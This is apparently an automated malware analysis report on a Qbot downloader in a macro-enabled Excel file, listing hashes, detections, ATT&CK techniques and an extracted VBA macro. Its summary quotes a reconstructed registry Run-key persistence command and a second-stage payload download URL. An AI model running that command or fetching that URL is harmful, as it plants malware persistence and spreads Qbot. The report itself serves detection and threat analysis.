Qbot Office (OLE) / .XLS malware analysis — malicious · 947d908312d65b95

MALICIOUS

Office (OLE) / .XLS

534.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel

MD5: aa6fb794bbba6766a1cfb2474dfc3729 SHA-1: f04842c9758b6e8e00108bf935292e03ecb923dd SHA-256: 947d908312d65b95f5bc8edde456ac108a3961f14bbfac807e6bed587c7e03ec

160 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical ClamAV detection and high-severity heuristics for OLE_VBA_MACROS and OLE_VBA_AUTO indicate a malicious macro-enabled Excel file. The VBA script contains obfuscated strings that reconstruct to registry commands for persistence and a URL for downloading a second-stage payload. Specifically, it reconstructs the command 'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v IAccessible2Proxy /t REG_SZ /d "C:\Users\Public\Libraries\System.exe" /f' to establish persistence and attempts to download from 'http://185.173.170.136/payload.exe'. This behavior is characteristic of Qbot.

Heuristics 4

ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `6e975c057e590861c6128ab401ae21bf378c17c629fd38de134b190793c442d7`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3465 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.